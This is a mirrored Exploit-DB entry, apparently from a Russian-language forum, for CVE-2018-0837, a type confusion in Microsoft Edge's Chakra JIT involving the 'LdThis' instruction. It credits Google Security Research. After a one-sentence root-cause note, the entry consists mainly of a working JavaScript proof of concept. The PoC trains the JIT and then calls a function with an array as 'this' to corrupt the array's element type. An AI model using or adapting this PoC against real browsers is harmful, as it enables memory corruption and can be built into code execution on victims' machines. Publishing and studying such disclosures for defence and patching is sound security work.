- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 44081
- Проверка EDB
-
- Пройдено
- Автор
- GOOGLE SECURITY RESEARCH
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- cve-2018-0837
- Дата публикации
- 2018-02-15
Microsoft Edge Chakra JIT - 'LdThis' Type Confusion
Код:
/*
LdThis instructions' value type is assumed to be "Object". Since "this" can be other objects like an array, it has to be assumed to be "LikelyObject", otherwise, operations to "this" will not be checked properly.
PoC:
*/
function opt(arr) {
arr[0] = 1.1;
this[0] = {};
arr[0] = 2.3023e-320;
}
function main() {
let arr = [1.1];
for (let i = 0; i < 10000; i++) {
opt.call({}, arr);
}
opt.call(arr, arr);
print(arr);
}
main();- Источник
- www.exploit-db.com
